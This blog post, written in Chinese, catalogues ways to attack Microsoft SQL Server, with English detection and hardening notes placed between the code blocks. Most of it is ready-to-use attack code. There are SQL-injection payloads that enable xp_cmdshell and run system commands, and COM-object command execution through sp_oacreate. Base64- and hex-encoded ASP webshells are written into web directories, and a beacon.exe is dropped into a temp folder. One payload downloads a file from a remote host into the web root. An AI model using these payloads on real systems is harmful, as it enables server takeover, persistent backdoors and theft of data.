
MSSQL攻击面探索

xp_cmdshell

开启

-- Stacked-query payload for an injectable `id` parameter: it enables 'show advanced options'
-- and then 'xp_cmdshell' (off by default) through sp_configure.
-- Defender notes: sp_configure/RECONFIGURE require ALTER SETTINGS (held by sysadmin and
-- serveradmin), so this only succeeds when the web application connects with an
-- over-privileged login. Each option change is written to the SQL Server error log; alert
-- on xp_cmdshell changing to 1 and compare sys.configurations against the hardened baseline.
-- Root fix: bind `id` as a query parameter instead of concatenating it into the statement.
id=1 ' EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE; --+

命令执行

-- Runs `whoami` through xp_cmdshell and redirects the output to c:/2.txt.
-- Defender notes: for sysadmin callers the command runs as the SQL Server service account,
-- so that account's Windows privileges bound the impact; run the service under a
-- low-privileged account. cmd.exe started by sqlservr.exe is a high-signal
-- process-creation detection.
id=1 ' exec master.dbo.xp_cmdshell 'whoami > c:/2.txt' --+

盲写结果到网站目录

盲写结果到网站目录,c:\hellomy.txt为网站特征文件,直接用这条语句到注入场景会有问题

-- Searches c:\ recursively for the marker file hellomy.txt (described in the text above as a
-- file known to belong to the web site) and writes the `whoami` output next to it as whoami.txt.
-- Defender notes: this depends on the SQL Server service account having write access to the
-- web content directory; remove that ACL and monitor web roots for files created by
-- processes descended from sqlservr.exe.
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)'

回显结果直接插入表中

-- Two requests: the first creates tmpTable and fills it with the output lines of
-- xp_cmdshell 'ipconfig' (INSERT ... EXEC); the second returns one numbered row
-- (row_number = 3) through a UNION into the page's normal result set.
-- Defender notes: the application login needs CREATE TABLE for this, which a read-only web
-- login would not have. A leftover tmpTable is a forensic artifact: review sys.tables for
-- objects whose create_date does not match a deployment.
id=1' CREATE TABLE tmpTable (tmp1 varchar(8000));insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig';
id=1' union select 1,tmp1,null from (SELECT ROW_NUMBER () OVER (ORDER BY tmp1) AS row_number,* from tmpTable) as a where row_number=3 --

回显结果先落地再导入表中

自行修改适配SQL注入场景,前文有示例

-- Step 1: run ipconfig through a wscript.shell COM object (OLE Automation) and redirect the
-- output to a file under c:\users\public.
-- Defender notes: sp_oacreate/sp_oamethod only work while 'Ole Automation Procedures' is
-- enabled (off by default); keep it disabled and audit calls to the sp_OA* procedures.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c ipconfig >c:\\users\\public\\111.txt'

--drop table testTable
-- Step 2: staging table that receives the lines of the file.
CREATE TABLE testTable (data varchar(2000));
 
-- Import the file's contents into the staging table.
-- Defender notes: BULK INSERT requires ADMINISTER BULK OPERATIONS (or bulkadmin membership)
-- plus INSERT on the target table; an application login should hold neither. Output staged
-- in a world-writable directory such as c:\users\public is worth a file-creation alert.
BULK INSERT testTable 
  FROM 'c:\users\public\111.txt'
  WITH 
   (
     ROWTERMINATOR ='\n'
   )
-- Query the result
select * from testTable;

无堆叠情况下开启xp_cmdshell并命令执行

-- Variant for injection points that do not accept stacked statements (per the heading): the
-- whole sequence is passed as one string to EXECUTE() behind an always-true IF.
-- Defender notes: the required privileges and the error-log entries are the same as for a
-- direct sp_configure call. The inner statements exist only inside a dynamic-SQL string, so
-- detections should key on the configuration change and the xp_cmdshell execution
-- themselves rather than on the text of the outer request.
if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell ''whoami''');

sp_oacreate

所有语句只在MSSQL客户端中使用过,可能SQL注入场景下需要自行调试

开启

-- Enables 'Ole Automation Procedures', the server option that gates sp_OACreate and the
-- other sp_OA* procedures used in the following sections.
-- Defender notes: the option is off by default and changing it needs ALTER SETTINGS
-- (sysadmin or serveradmin). Keep it at 0 unless a documented job depends on it, alert on
-- the error-log entry recording the change, and check sys.configurations during audits.
exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;   
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

命令执行

-- Creates a wscript.shell COM object and calls its run method to execute `whoami /all`,
-- redirecting the output to a file under C:\test.
-- Defender notes: xp_cmdshell is not involved, so controls that only disable or watch
-- xp_cmdshell miss this path. Audit sp_oacreate use and treat cmd.exe launched under the
-- SQL Server service account as suspicious.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami /all >C:\\test\test.txt'

回显,SQL注入场景下有问题

-- Same marker-file technique as the xp_cmdshell version, but launched through a
-- wscript.shell COM object: finds c:\hellomy.txt and writes whoami.txt beside it.
-- Defender notes: the write lands in the web content directory, so it needs the SQL Server
-- service account to have write access there; file-integrity monitoring on the web root
-- catches the new file regardless of which procedure launched the command.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c "for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)"'

写Webshell

--写webshell
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (echo PCUKUmVzcG9uc2UuQ2hhclNldCA9ICJVVEYtOCIgCms9ImU0NWUzMjlmZWI1ZDkyNWIiClNlc3Npb24oImsiKT1rCnNpemU9UmVxdWVzdC5Ub3RhbEJ5dGVzCmNvbnRlbnQ9UmVxdWVzdC5CaW5hcnlSZWFkKHNpemUpCkZvciBpPTEgVG8gc2l6ZQpyZXN1bHQ9cmVzdWx0JkNocihhc2NiKG1pZGIoY29udGVudCxpLDEpKSBYb3IgQXNjKE1pZChrLChpIGFuZCAxNSkrMSwxKSkpCk5leHQKZXhlY3V0ZShyZXN1bHQpCiU+ > %i\..\bx.txt)'
-- Decode: locates bx.txt (written by the previous statement) and uses certutil.exe -decode
-- to turn the Base64 text into 1.asp in the same directory.
-- Defender notes: certutil.exe -decode running under sqlservr.exe -> cmd.exe has no
-- legitimate reason to occur on a database server and is a strong detection. A new script
-- file (.asp) appearing in a web root outside a deployment should raise a file-integrity alert.
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\bx.txt'') do (certutil.exe -decode %i\..\bx.txt %i\..\1.asp)'

COM组件

命令执行

-- Instantiates a COM object by CLSID rather than by ProgID, calls its exec method with a
-- cmd.exe command line, then reads the command's StdOut with readall and returns it.
-- NOTE(review): the CLSID appears to be the one registered for WScript.Shell; confirm
-- against HKCR\CLSID on a reference host.
-- Defender notes: rules that look for the literal string 'wscript.shell' do not match this
-- form; detect on the sp_oacreate call itself, whatever its argument.
declare @ffffffff0x int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'
-- The output is returned in the query result, so nothing is written to disk by this variant.
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

写Webshell

把Webshell进行HEX编码进行写入,保证不出现什么乱七八糟的字符

-- Creates a COM object by CLSID, sets its Type property to 1 and opens it; the statements
-- that follow write a byte literal into it and save it to a file.
-- NOTE(review): the CLSID and the Type/Open/Write/SaveToFile sequence match the ADODB.Stream
-- usage shown later on this page, so this is presumably the same class; confirm.
-- Defender notes: the file is written by the SQL Server process itself (the COM object is
-- typically loaded in-process), so process-creation rules see nothing; rely on file-creation
-- telemetry for sqlservr.exe and on auditing of sp_OACreate.
DECLARE @ObjectToken INT;
EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT;
EXEC Sp_OASetProperty @ObjectToken, 'Type', 1;
EXEC sp_oamethod @ObjectToken, 'Open';
EXEC sp_oamethod @ObjectToken, 'Write', NULL,0x3c250a526573706f6e73652e43686172536574203d20225554462d3822200a6b3d2265343565333239666562356439323562220a53657373696f6e28226b22293d6b0a73697a653d526571756573742e546f74616c42797465730a636f6e74656e743d526571756573742e42696e617279526561642873697a65290a466f7220693d3120546f2073697a650a726573756c743d726573756c74264368722861736362286d69646228636f6e74656e742c692c31292920586f7220417363284d6964286b2c286920616e64203135292b312c312929290a4e6578740a6578656375746528726573756c74290a253e;
EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2;
EXEC sp_oamethod @ObjectToken, 'Close';
EXEC sp_OADestroy @ObjectToken;

写EXE

把exe转hex

xxd -ps beacon.exe hex.txt

写入

MSSQL2005似乎出现了点问题,2008正常

-- Writes the bytes held in @DATA to @filepath through an ADODB.Stream COM object
-- (Type = 1 selects binary mode; SaveToFile option 2 overwrites an existing file).
-- Defender notes: the write is performed by the SQL Server process (the COM object is
-- typically loaded in-process), so there is no child process to detect. Monitor for
-- executables created by sqlservr.exe, particularly under C:\Windows\Temp, and use
-- application control (AppLocker/WDAC) to block execution from temporary directories.
DECLARE @DATA VARBINARY(MAX) = 0x...
        DECLARE @filepath VARCHAR(MAX) = 'C:\\Windows\\temp\\cs.exe'
        DECLARE @ObjectToken INT
        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
        EXEC sp_OAMethod @ObjectToken, 'Open'
        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA
        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2
        EXEC sp_OAMethod @ObjectToken, 'Close'
        EXEC sp_OADestroy @ObjectToken
        SELECT @filepath

写VBS并执行

-- Write the VBS file: creates a scripting.filesystemobject, creates
-- c:\\www\\ffffffff0x.vbs (third argument 1 = overwrite) and writes one line of text to it.
declare @o int, @f int, @t int, @ret int,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'

-- Execute: runs the file through a wscript.shell COM object.
-- NOTE(review): the ProgID and arguments are written in bracket form instead of as quoted
-- strings; signatures that match only 'wscript.shell' in quotes may miss it (verify).
-- Defender notes: a script file created and then launched under the SQL Server service
-- account is anomalous; alert on script hosts started by that account and consider
-- disabling Windows Script Host on database servers where nothing depends on it.
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs]

复制文件

-- Copies a file with the copyfile method of a scripting.filesystemobject COM object.
-- Defender notes: the copy is carried out by the SQL Server process with the service
-- account's file permissions and (the object being typically loaded in-process) without a
-- child process; writes under c:\windows\system32 only succeed when the service account is
-- over-privileged, which is the condition to remove.
declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe';

移动文件

-- Moves (renames) a file with the movefile method of a scripting.filesystemobject COM object.
-- Defender notes: renames performed by sqlservr.exe outside its data, log and backup
-- directories are unusual; file-system auditing on web content directories records them
-- even though no command shell is started.
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out
exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt'

删除文件

-- Deletes a file with the deletefile method of a scripting.filesystemobject COM object and
-- then releases the object with sp_oadestroy. @result is declared but not used.
-- Defender notes: deletion can remove staged output or other evidence from disk, so
-- incident responders should not rely on the files still being present; statement-level
-- auditing of sp_OA* calls (SQL Server Audit or Extended Events) keeps a record that
-- survives the deletion.
declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'c:\\www\\1.txt'
exec sp_oadestroy @ffffffff0x

远程下载文件

-- Fetches a URL with a Microsoft.XMLHTTP COM object (synchronous GET), reads responseBody
-- into @response, then writes it to a file under C:\inetpub\wwwroot through ADODB.Stream
-- (Type = 1 binary, Mode = 3 read/write, SaveToFile option 1 = create only if absent).
-- Defender notes: the HTTP request originates from the database server itself. Database
-- hosts rarely need outbound web access, so egress filtering blocks this step and an
-- outbound HTTP connection made by sqlservr.exe is a useful network detection. The write
-- into the web root additionally requires the service account to have access there.
DECLARE @object INT, @object2 INT, @response varbinary(8000);exec Sp_OACreate 'Microsoft.XMLHTTP', @object OUTPUT;EXEC sp_OAMethod @object, 'Open', NULL, 'GET', 'http://192.168.2.107:9000/1.txt',0;EXEC sp_OAMethod @object, 'Send', NULL;EXEC sp_OAGetProperty @object, 'responseBody', @response OUTPUT;EXEC Sp_OACreate 'ADODB.Stream', @object2 OUTPUT ;EXEC sp_OASetProperty @object2, 'Type', 1;EXEC sp_OASetProperty @object2, 'Mode', 3;EXEC sp_OAMethod @object2, 'Open', NULL EXEC sp_OAMethod @object2, 'Write', NULL, @response;EXEC sp_OAMethod @object2, 'SaveToFile', NULL, 'C:\inetpub\wwwroot\1.txt', 1;
posted @ 2023-01-08 20:01  mi2ac1e